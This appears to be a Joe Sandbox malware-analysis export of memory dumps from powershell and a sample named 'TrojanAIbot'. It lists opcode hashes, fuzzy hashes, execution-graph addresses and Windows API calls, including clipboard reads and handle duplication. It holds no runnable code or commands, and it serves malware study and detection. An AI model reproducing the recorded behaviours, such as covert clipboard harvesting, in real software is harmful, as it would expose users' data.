                                                                                                                    • Opcode ID: a39091dba7e4cd38e24e1020437989d9d958f8eef98ac81f08455dc1bace2231
                                                                                                                    • Instruction ID: 5a177bc5bd4eff87885fcd8c9824e28c53e22bbadb05b03f5d159f37aa4d9597
                                                                                                                    • Opcode Fuzzy Hash: a39091dba7e4cd38e24e1020437989d9d958f8eef98ac81f08455dc1bace2231
                                                                                                                    • Instruction Fuzzy Hash: B9B09230044708CFC2486F79A4049157329EB4522A39084ECE91E0A296CE36E889CE45
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7670000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$4']q$4']q$pigj$tP]q$tP]q
                                                                                                                    • API String ID: 0-1877703305
                                                                                                                    • Opcode ID: 0d9b6281b77f2e1f8fb6fd20e575731bdab3e33fbb023b4fe210b2a2f1939530
                                                                                                                    • Instruction ID: fb19d029eeedb53096b740cdb3229c44993bf30109df2c838d3cdff9b2aaa162
                                                                                                                    • Opcode Fuzzy Hash: 0d9b6281b77f2e1f8fb6fd20e575731bdab3e33fbb023b4fe210b2a2f1939530
                                                                                                                    • Instruction Fuzzy Hash: 7ED16BB1B0420ACFC7288B7D94506A6BBF6EFC6251F18C47BC4568B355DB35C846CBA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7670000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fbq$4']q$4']q$4']q$4']q
                                                                                                                    • API String ID: 0-2283484764
                                                                                                                    • Opcode ID: a6df30e0486efcad144143f38b4ad40fa7aa3584939f72ca4e44204f232de224
                                                                                                                    • Instruction ID: 959a1f171045a299762f51084bf2c65567bd3e4b968c70e8dcd280520090c1f5
                                                                                                                    • Opcode Fuzzy Hash: a6df30e0486efcad144143f38b4ad40fa7aa3584939f72ca4e44204f232de224
                                                                                                                    • Instruction Fuzzy Hash: E6D137B07042459FDB159B78942076ABFA6EFC2290F14C4BAD546CB392DA35DC42CBF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `^q$`^q$`^q$`^q
                                                                                                                    • API String ID: 0-4294711580
                                                                                                                    • Opcode ID: 2c56da318326e4a68aa1f5680577afa539c785c642749787ffb16d6f57280096
                                                                                                                    • Instruction ID: 1132036cb069368839bc557a9060a82429f578ce433c6be8ceb1aa20685348c1
                                                                                                                    • Opcode Fuzzy Hash: 2c56da318326e4a68aa1f5680577afa539c785c642749787ffb16d6f57280096
                                                                                                                    • Instruction Fuzzy Hash: E0B1B474E002099FCB55DFA9D990A9DFBF6FF88300F208669D819AB355DB34A905CF90
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `^q$`^q$`^q$`^q
                                                                                                                    • API String ID: 0-4294711580
                                                                                                                    • Opcode ID: 6aa344453352923138a21f53a6de4a17bb5391f221730c09dbf51aa95cea2af5
                                                                                                                    • Instruction ID: 775d56e7847585fbfef166f652611425234f80836a0a30acda5b9bcee09e37e5
                                                                                                                    • Opcode Fuzzy Hash: 6aa344453352923138a21f53a6de4a17bb5391f221730c09dbf51aa95cea2af5
                                                                                                                    • Instruction Fuzzy Hash: 71B19374E002099FCB55DFA9D990A9DFBF6FF88300F208669D819AB354DB34A945CF90
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `^q$`^q$`^q$`^q
                                                                                                                    • API String ID: 0-4294711580
                                                                                                                    • Opcode ID: 7a8e5113ea8dc38fd8212af18dc5bc8cc6339dd85c4f1b3d4606f6afbdbfcd54
                                                                                                                    • Instruction ID: b1e07f06f53220a9a28260d376083a286ec0da90bc877d67c40291e0e8879794
                                                                                                                    • Opcode Fuzzy Hash: 7a8e5113ea8dc38fd8212af18dc5bc8cc6339dd85c4f1b3d4606f6afbdbfcd54
                                                                                                                    • Instruction Fuzzy Hash: 0FA1A174E002099FCB55DFA9D990A9DFBF6FF48300F20866AD819AB355DB34A905CF90
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7670000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-858218434
                                                                                                                    • Opcode ID: ce03ac44dff88147dc5f178bbf151930df2ef477c2674e8c9709309d67585cd0
                                                                                                                    • Instruction ID: 3b8583da441010a0fe0ab21829028beb3b3b42302684c24079ae8efc5862c384
                                                                                                                    • Opcode Fuzzy Hash: ce03ac44dff88147dc5f178bbf151930df2ef477c2674e8c9709309d67585cd0
                                                                                                                    • Instruction Fuzzy Hash: 94213BB1314316DBDB28557E8840B37BBDAAFC1791F24886A994BCB383DD79C852C361
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7670000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$$]q$$]q
                                                                                                                    • API String ID: 0-978391646
                                                                                                                    • Opcode ID: edc3664c11e3a702bf2a38600366694afbd38cbdad61ed2eb7ad0479d005dbac
                                                                                                                    • Instruction ID: 2306da942b9ab258439fb62290aead0f89f89d04ff1f348b8cd9c1e0e913f7a0
                                                                                                                    • Opcode Fuzzy Hash: edc3664c11e3a702bf2a38600366694afbd38cbdad61ed2eb7ad0479d005dbac
                                                                                                                    • Instruction Fuzzy Hash: 8501A7707093469FC72A163C58602166BB6AFC3A60B2945EBC495DB357CD288C06C7B6

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.2%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:90
                                                                                                                    Total number of Limit Nodes:11
                                                                                                                    execution_graph 17729 29c5238 17730 29c524f 17729->17730 17734 5e41660 17730->17734 17738 5e416b8 17730->17738 17735 5e41648 17734->17735 17735->17734 17742 5e412f4 17735->17742 17739 5e416c7 17738->17739 17740 5e412f4 4 API calls 17739->17740 17741 29c52c5 17740->17741 17744 5e412ff 17742->17744 17746 5e41334 17744->17746 17745 5e417ad 17745->17745 17752 5e4133f 17746->17752 17747 5e41a28 17751 5e41a53 17747->17751 17755 5e415a8 17747->17755 17749 5e415a8 OleInitialize 17749->17747 17750 5e41a40 17759 5e43351 17750->17759 17764 5e43360 17750->17764 17751->17745 17752->17747 17752->17749 17752->17751 17756 5e415b3 17755->17756 17758 5e42df9 17756->17758 17769 5e42194 17756->17769 17758->17750 17761 5e43360 17759->17761 17760 5e43412 17760->17751 17761->17760 17762 5e43828 WaitMessage 17761->17762 17776 5e4225c 17761->17776 17762->17761 17767 5e433c5 17764->17767 17765 5e43828 WaitMessage 17765->17767 17766 5e4225c DispatchMessageW 17766->17767 17767->17765 17767->17766 17768 5e43412 17767->17768 17768->17751 17771 5e4219f 17769->17771 17770 5e43113 17770->17758 17771->17770 17773 5e421b0 17771->17773 17774 5e43148 OleInitialize 17773->17774 17775 5e431ac 17774->17775 17775->17770 17777 5e440c8 DispatchMessageW 17776->17777 17778 5e44134 17777->17778 17778->17761 17717 29cfd10 DuplicateHandle 17718 29cfda6 17717->17718 17719 29cf6c0 17720 29cf706 GetCurrentProcess 17719->17720 17722 29cf758 GetCurrentThread 17720->17722 17723 29cf751 17720->17723 17724 29cf795 GetCurrentProcess 17722->17724 17725 29cf78e 17722->17725 17723->17722 17728 29cf7cb 17724->17728 17725->17724 17726 29cf7f3 GetCurrentThreadId 17727 29cf824 17726->17727 17728->17726 17779 29cd330 17782 29cd418 17779->17782 17780 29cd33f 17783 29cd439 17782->17783 17784 29cd45c 17782->17784 17783->17784 17785 29cd660 GetModuleHandleW 17783->17785 17784->17780 17786 29cd68d 17785->17786 17786->17780 17787 5e44198 17789 5e441a0 17787->17789 17788 5e441b4 17789->17788 17793 5e445d1 17789->17793 17804 5e445e0 17789->17804 17790 5e441c9 17794 5e445f2 17793->17794 17795 5e4460d 17794->17795 17797 5e44639 17794->17797 17800 5e445e0 OleGetClipboard 17795->17800 17801 5e445d1 OleGetClipboard 17795->17801 17796 5e44613 17796->17790 17799 5e446b9 17797->17799 17815 5e447a0 17797->17815 17819 5e44791 17797->17819 17798 5e446d7 17798->17790 17799->17790 17800->17796 17801->17796 17805 5e445f2 17804->17805 17806 5e4460d 17805->17806 17808 5e44639 17805->17808 17813 5e445e0 OleGetClipboard 17806->17813 17814 5e445d1 OleGetClipboard 17806->17814 17807 5e44613 17807->17790 17810 5e446b9 17808->17810 17811 5e447a0 OleGetClipboard 17808->17811 17812 5e44791 OleGetClipboard 17808->17812 17809 5e446d7 17809->17790 17810->17790 17811->17809 17812->17809 17813->17807 17814->17807 17817 5e447b5 17815->17817 17818 5e447db 17817->17818 17823 5e424cc 17817->17823 17818->17798 17821 5e447b5 17819->17821 17820 5e424cc OleGetClipboard 17820->17821 17821->17820 17822 5e447db 17821->17822 17822->17798 17824 5e44848 OleGetClipboard 17823->17824 17826 5e448e2 17824->17826

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 597 5e43360-5e433c3 598 5e433c5-5e433ef 597->598 599 5e433f2-5e43410 597->599 598->599 604 5e43412-5e43414 599->604 605 5e43419-5e43450 599->605 607 5e438d2-5e438e7 604->607 609 5e43456-5e4346a 605->609 610 5e43881 605->610 611 5e4346c-5e43496 609->611 612 5e43499-5e434b8 609->612 613 5e43886-5e4389c 610->613 611->612 619 5e434d0-5e434d2 612->619 620 5e434ba-5e434c0 612->620 613->607 623 5e434d4-5e434ec 619->623 624 5e434f1-5e434fa 619->624 621 5e434c4-5e434c6 620->621 622 5e434c2 620->622 621->619 622->619 623->613 626 5e43502-5e43509 624->626 627 5e43513-5e4351a 626->627 628 5e4350b-5e43511 626->628 630 5e43524 627->630 631 5e4351c-5e43522 627->631 629 5e43527-5e43544 call 5e42210 628->629 634 5e43699-5e4369d 629->634 635 5e4354a-5e43551 629->635 630->629 631->629 637 5e436a3-5e436a7 634->637 638 5e4386c-5e4387f 634->638 635->610 636 5e43557-5e43594 635->636 646 5e43862-5e43866 636->646 647 5e4359a-5e4359f 636->647 639 5e436c1-5e436ca 637->639 640 5e436a9-5e436bc 637->640 638->613 642 5e436cc-5e436f6 639->642 643 5e436f9-5e43700 639->643 640->613 642->643 644 5e43706-5e4370d 643->644 645 5e4379f-5e437b4 643->645 648 5e4373c-5e4375e 644->648 649 5e4370f-5e43739 644->649 645->646 661 5e437ba-5e437bc 645->661 646->626 646->638 650 5e435d1-5e435e6 call 5e42234 647->650 651 5e435a1-5e435af call 5e4221c 647->651 648->645 684 5e43760-5e4376a 648->684 649->648 659 5e435eb-5e435ef 650->659 651->650 664 5e435b1-5e435cf call 5e42228 651->664 665 5e43660-5e4366d 659->665 666 5e435f1-5e43603 call 5e42240 659->666 662 5e437be-5e437f7 661->662 663 5e43809-5e43826 call 5e42210 661->663 678 5e43800-5e43807 662->678 679 5e437f9-5e437ff 662->679 663->646 681 5e43828-5e43854 WaitMessage 663->681 664->659 665->646 682 5e43673-5e4367d call 5e42250 665->682 689 5e43605-5e43635 666->689 690 5e43643-5e4365b 666->690 678->646 679->678 686 5e43856 681->686 687 5e4385b 681->687 694 5e4368c-5e43694 call 5e42268 682->694 695 5e4367f-5e43682 call 5e4225c 682->695 697 5e43782-5e4379d 684->697 698 5e4376c-5e43772 684->698 686->687 687->646 705 5e43637 689->705 706 5e4363c 689->706 690->613 694->646 701 5e43687 695->701 697->645 697->684 702 5e43774 698->702 703 5e43776-5e43778 698->703 701->646 702->697 703->697 705->706 706->690
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DispatchMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2061451462-0
                                                                                                                    • Opcode ID: 8bf5218267cbac6b864f94e86c19868b8ec399313bd7f0266eb49edd05fbeb68
                                                                                                                    • Instruction ID: f297a90222ec53d41e689868118c8aef1281c9c7364510775d2ad790e6c6eaae
                                                                                                                    • Opcode Fuzzy Hash: 8bf5218267cbac6b864f94e86c19868b8ec399313bd7f0266eb49edd05fbeb68
                                                                                                                    • Instruction Fuzzy Hash: 2BF15F31E00209CFEB14DFA9D948BADBBF2BF48304F159958E445AB295DB74E985CF80

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 528 29cf6ba-29cf74f GetCurrentProcess 532 29cf758-29cf78c GetCurrentThread 528->532 533 29cf751-29cf757 528->533 534 29cf78e-29cf794 532->534 535 29cf795-29cf7c9 GetCurrentProcess 532->535 533->532 534->535 537 29cf7cb-29cf7d1 535->537 538 29cf7d2-29cf7ed call 29cfc98 535->538 537->538 540 29cf7f3-29cf822 GetCurrentThreadId 538->540 542 29cf82b-29cf88d 540->542 543 29cf824-29cf82a 540->543 543->542
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 029CF73E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 029CF77B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 029CF7B8
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 029CF811
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: 461027608d7c21fec9e6b86070e395b8f60e748a3280d92b123e29bea52028ea
                                                                                                                    • Instruction ID: f468626fa17bad034333c6d9f054ecd0ef8fb89ffac28a1a17d7fdc04bb68c5e
                                                                                                                    • Opcode Fuzzy Hash: 461027608d7c21fec9e6b86070e395b8f60e748a3280d92b123e29bea52028ea
                                                                                                                    • Instruction Fuzzy Hash: 125164B0D003098FDB54DFA9D648BAEBBF6FF48304F208459E519A7360D7389944CBA6

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 550 29cf6c0-29cf74f GetCurrentProcess 554 29cf758-29cf78c GetCurrentThread 550->554 555 29cf751-29cf757 550->555 556 29cf78e-29cf794 554->556 557 29cf795-29cf7c9 GetCurrentProcess 554->557 555->554 556->557 559 29cf7cb-29cf7d1 557->559 560 29cf7d2-29cf7ed call 29cfc98 557->560 559->560 562 29cf7f3-29cf822 GetCurrentThreadId 560->562 564 29cf82b-29cf88d 562->564 565 29cf824-29cf82a 562->565 565->564
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 029CF73E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 029CF77B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 029CF7B8
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 029CF811
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: a506690ad263700250cf5f427087ff167b9cbd4a77989969eba75915a07c673c
                                                                                                                    • Instruction ID: d1b9b38b390a6520445463f0cd6a1fbfa13f0216258761ac513d0642bd81c5f7
                                                                                                                    • Opcode Fuzzy Hash: a506690ad263700250cf5f427087ff167b9cbd4a77989969eba75915a07c673c
                                                                                                                    • Instruction Fuzzy Hash: 005166B09003098FDB14DFA9D548BAEBBF6FF48314F20845DE519A7360D7789944CB66

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 709 29cd418-29cd437 710 29cd439-29cd446 call 29cc720 709->710 711 29cd463-29cd467 709->711 718 29cd45c 710->718 719 29cd448 710->719 712 29cd469-29cd473 711->712 713 29cd47b-29cd4bc 711->713 712->713 720 29cd4be-29cd4c6 713->720 721 29cd4c9-29cd4d7 713->721 718->711 764 29cd44e call 29cd6b0 719->764 765 29cd44e call 29cd6c0 719->765 720->721 722 29cd4d9-29cd4de 721->722 723 29cd4fb-29cd4fd 721->723 726 29cd4e9 722->726 727 29cd4e0-29cd4e7 call 29cc72c 722->727 725 29cd500-29cd507 723->725 724 29cd454-29cd456 724->718 728 29cd598-29cd658 724->728 729 29cd509-29cd511 725->729 730 29cd514-29cd51b 725->730 732 29cd4eb-29cd4f9 726->732 727->732 759 29cd65a-29cd65d 728->759 760 29cd660-29cd68b GetModuleHandleW 728->760 729->730 733 29cd51d-29cd525 730->733 734 29cd528-29cd531 call 29cc73c 730->734 732->725 733->734 740 29cd53e-29cd543 734->740 741 29cd533-29cd53b 734->741 742 29cd545-29cd54c 740->742 743 29cd561-29cd56e 740->743 741->740 742->743 745 29cd54e-29cd55e call 29cc74c call 29cc75c 742->745 749 29cd570-29cd58e 743->749 750 29cd591-29cd597 743->750 745->743 749->750 759->760 761 29cd68d-29cd693 760->761 762 29cd694-29cd6a8 760->762 761->762 764->724 765->724
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 029CD67E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: f9a40d1e8bbfae52c19a3b9123c687dceb54176b3e63510705080501cac97951
                                                                                                                    • Instruction ID: 892b4fd8b083e51cf74ec9531a1bcaa2beb114b8cdf20af76ad6971e5fcb600e
                                                                                                                    • Opcode Fuzzy Hash: f9a40d1e8bbfae52c19a3b9123c687dceb54176b3e63510705080501cac97951
                                                                                                                    • Instruction Fuzzy Hash: 4A815670A00B458FD724DF29D0547AABBF5FF88304F10892ED48ADBA50D774E846CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 766 5e4483c-5e44898 768 5e448a2-5e448e0 OleGetClipboard 766->768 769 5e448e2-5e448e8 768->769 770 5e448e9-5e448fa 768->770 769->770 772 5e44904-5e44937 770->772 775 5e44947 772->775 776 5e44939-5e4493d 772->776 778 5e44948 775->778 776->775 777 5e4493f 776->777 777->775 778->778
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 220874293-0
                                                                                                                    • Opcode ID: abeaee383844454f2064abbe9e87688ab4e989e028ff466050d8662326a487f4
                                                                                                                    • Instruction ID: 0187b5309ad09a92dcea822639365e47791b6c78e133417a3764977344535fcc
                                                                                                                    • Opcode Fuzzy Hash: abeaee383844454f2064abbe9e87688ab4e989e028ff466050d8662326a487f4
                                                                                                                    • Instruction Fuzzy Hash: 993111B0A01249DFDB10CF99D984BCEBBF5BB48304F248069E544AB390D7B46945CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 779 5e424cc-5e448e0 OleGetClipboard 782 5e448e2-5e448e8 779->782 783 5e448e9-5e448fa 779->783 782->783 785 5e44904-5e44937 783->785 788 5e44947 785->788 789 5e44939-5e4493d 785->789 791 5e44948 788->791 789->788 790 5e4493f 789->790 790->788 791->791
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 220874293-0
                                                                                                                    • Opcode ID: 5f7429b6e92af1b61be750993255479166c03fd724533e5b6de13eefa6116d6c
                                                                                                                    • Instruction ID: 3f7b2c3b1572889732b95acc90eb9a5cfcebd0f9b3f33f85c3d5e193038836fa
                                                                                                                    • Opcode Fuzzy Hash: 5f7429b6e92af1b61be750993255479166c03fd724533e5b6de13eefa6116d6c
                                                                                                                    • Instruction Fuzzy Hash: 8C311FB0A0524DDFDB10CF99D984BDEBBF5BB48304F208069E544AB290D7B46944CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 797 29cfd10-29cfda4 DuplicateHandle 798 29cfdad-29cfdca 797->798 799 29cfda6-29cfdac 797->799 799->798
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CFD97
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 10224c0966dad6878f26dd7d62310428781efd262f0d1b0ec3ee10da9d07be1b
                                                                                                                    • Instruction ID: 095fdd2ce1f723017df264c81e250a6dab6514c2c9955cd6db4688fab4f4b81a
                                                                                                                    • Opcode Fuzzy Hash: 10224c0966dad6878f26dd7d62310428781efd262f0d1b0ec3ee10da9d07be1b
                                                                                                                    • Instruction Fuzzy Hash: 1A21C6B59002489FDB10CF9AD984ADEBFF9FF48310F14841AE914A3350D378A944CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 792 29cfd0a-29cfda4 DuplicateHandle 793 29cfdad-29cfdca 792->793 794 29cfda6-29cfdac 792->794 794->793
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CFD97
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: a432cd824381398097fa32c31eab29c61be09ee28fa62449cb11b3ad4810b925
                                                                                                                    • Instruction ID: 9dfd8025c36574cc4703da10b21a0c55c0d0453b56fd6d54cca76cc095013775
                                                                                                                    • Opcode Fuzzy Hash: a432cd824381398097fa32c31eab29c61be09ee28fa62449cb11b3ad4810b925
                                                                                                                    • Instruction Fuzzy Hash: A321D4B5D002489FDB10CFA9D584AEEBBF9EF08310F14841AE914A3310D378A940CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 802 5e42299-5e4229a 803 5e42262-5e42263 802->803 804 5e4229c-5e422b8 802->804 805 5e440c8-5e44132 DispatchMessageW 803->805 804->805 807 5e44134-5e4413a 805->807 808 5e4413b-5e4414f 805->808 807->808
                                                                                                                    APIs
                                                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E43687), ref: 05E44125
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DispatchMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2061451462-0
                                                                                                                    • Opcode ID: 57e1888db10e376231c891f730eeb888e5df1c577232de30378c884c3733a90c
                                                                                                                    • Instruction ID: ced21bc85b925a640d51a6aa0fc42105937f990ef59c8162db04c602b01c411f
                                                                                                                    • Opcode Fuzzy Hash: 57e1888db10e376231c891f730eeb888e5df1c577232de30378c884c3733a90c
                                                                                                                    • Instruction Fuzzy Hash: C42164B6C043588FCB10DF9AE880BDEBBF4EF48314F10806AE558A3240D338A904CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 811 29cd618-29cd658 812 29cd65a-29cd65d 811->812 813 29cd660-29cd68b GetModuleHandleW 811->813 812->813 814 29cd68d-29cd693 813->814 815 29cd694-29cd6a8 813->815 814->815
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 029CD67E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 7b9d8fee69724cae35989e46f707e75f2f8f3921f738da3f49c396356d0c1879
                                                                                                                    • Instruction ID: 39f7cf599965a95ae7d16dc6dd193708834539717e665a8f427d6f39579ff443
                                                                                                                    • Opcode Fuzzy Hash: 7b9d8fee69724cae35989e46f707e75f2f8f3921f738da3f49c396356d0c1879
                                                                                                                    • Instruction Fuzzy Hash: 3B1110B5C003498FCB10DF9AC944ADEFBF8EF88314F20842AD828A7210C379A545CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 817 5e421b0-5e431aa OleInitialize 819 5e431b3-5e431d0 817->819 820 5e431ac-5e431b2 817->820 820->819
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 05E4319D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
